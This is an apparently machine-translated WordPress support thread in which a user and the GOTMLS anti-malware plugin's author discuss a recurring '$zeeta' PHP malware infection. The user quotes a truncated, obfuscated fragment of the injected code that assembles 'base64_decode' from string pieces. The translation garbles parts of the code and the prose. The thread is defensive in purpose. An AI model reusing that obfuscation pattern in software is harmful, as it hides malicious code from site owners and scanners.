Un utente ha chiesto informazioni su Anti-Malware Security and Brute-Force Firewall di Wordpress

global $ zeeta; non si trova su gotmls

Un utente ha chiesto 👇

Ciao

Ho eseguito GOTMLS e ho trovato alcuni file in quarantena, il che è fantastico. Tuttavia, il malware continuava a tornare.

È normale quando si fa clic su un collegamento malware – annunci rougue

Ho cercato nel sito che puoi trovare Qui e ho trovato il codice seguente in Applicazioni

“$ Zeeta global;
if (! $ npDcheckClassBgp &&! isset ($ zeeta)) {

$ ea = ‘_shaesx_’; $ ay = ‘get_data_ya’; $ ae = ‘decodifica’; $ ea = str_replace (‘_ sha’, ‘bas’, $ ea); $ ao = ‘wp_cd’; $ ee = $ ea. $ ae; $ oa = str_replace (‘sx’, ’64’, $ ee); $ algo = ‘default’; $ pas = “Zgc5c4MXrK0ubQgN4pBWZv2dPRfXN70cmCWIX7HVoQ ==”; “

C’è più codice, che posso inviare via email se lo desideri.

Mi chiedo se GOTMLS possa essere aggiornato per aiutare a rimuovere questo problema globale di $ zeeta?

Questo argomento è stato modificato 4 mesi, 3 settimane fa da. Questo argomento è stato modificato 4 mesi, 3 settimane fa da.

Autore del plugin

(@scheeeli)

4 mesi, 3 settimane fa

Ho visto codice come quell’esempio che pubblichi e il mio plugin dovrebbe rimuoverlo automaticamente, ma dovrei vedere l’intero file per essere sicuro che questa sia sempre la stessa minaccia. Puoi inviarmi l’intero contenuto di quel file, quindi lo controllerò e aggiungerò questa nuova versione alle mie definizioni di malware se viene modificata.

eli AT gotmls DOT glan

Lanciatore di thread

(@sulla strada)

4 mesi, 3 settimane fa

Ciao Eli,

Grazie per la pronta risposta. Ti ho appena inviato il codice completo di Funzioni. Sono anche felice di aiutarti se hai bisogno di ulteriori informazioni. Questo virus ha anche file .bt con indirizzi IP rimasti.

Sarò felice di iscrivermi se il tuo plugin è in grado di rimuovere questo codice dannoso!

Grazie.

Autore del plugin

(@scheeeli)

4 mesi, 3 settimane fa

Seguendo qui per ringraziarti per il codice completo che mi hai inviato in un’e-mail. Questa era fondamentalmente la stessa minaccia che ho visto prima nelle mie definizioni di malware, ma anche se non l’ho mai vista da sola in un file dannoso completo in passato, questa è stata iniettata nel tuo codice PHP esistente. quindi rilascio un nuovo aggiornamento della definizione che applicherà questa nuova versione a te (senza rimuovere o danneggiare il codice PHP esistente che dovrebbe esistere; -)

Scarica gli ultimi aggiornamenti delle definizioni ed esegui di nuovo la scansione completa. Non credo di aver bisogno di vedere quegli elenchi di indirizzi IP, ma fammi sapere se trovi qualcos’altro che dovrei esaminare.

Lanciatore di thread

(@sulla strada)

4 mesi, 3 settimane fa

Nessun problema Eli, e grazie per l’aggiornamento delle definizioni.

Attualmente sto monitorando. Il tuo aggiornamento ha rimosso il file infetto, ma nel giro di poche ore il sito è stato nuovamente infettato. Guardo i log del sito per vedere da dove proviene l’infezione e per cercare di inchiodarla.

Nel frattempo, consiglieresti uno di questi plugin di sicurezza? per esempio. iThemes Security ecc. O sarebbe meglio usare il tuo firewall?

Autore del plugin

(@scheeeli)

4 mesi, 3 settimane fa

Se stai lavorando per prevenire o mantenere una minaccia attiva, allora direi: maggiore è la sicurezza, più umido. Sebbene molti firewall abbiano una funzione molto simile e possano sovrapporsi ad alcune delle stesse protezioni, ci sono molte variazioni che a volte possono essere utili per raddoppiare la protezione. L’unica cosa a cui devi prestare attenzione è l’override dei firewall che potrebbero bloccarti fuori dal tuo sito 😉

Alcuni plug-in del firewall possono interferire con il funzionamento di altri plug-in di sicurezza. Penso che cerchiamo tutti di non calpestarci a vicenda, ma è un delicato equilibrio quando il tuo compito è esaminare attività sospette sul sito.

Non aver paura di provare altri plug-in, basta guardare le recensioni e cercare plug-in ben supportati in modo da poter ottenere aiuto se esageri.

Per quanto riguarda il supporto dell’origine di questa minaccia ricorrente, i tuoi suggerimenti forensi più comuni sono i timestamp sui file modificati in modo dannoso. Cerca nella quarantena anti-malware i tempi di infezione delle ultime infezioni (questi sono mostrati in GMT) e poi incrocia questi tempi con l’attività nei tuoi file access_log.

Questa risposta è stata modificata 4 mesi, 3 settimane fa.

Was this helpful?

0 / 0

Lascia un commento 0

Your email address will not be published. Required fields are marked *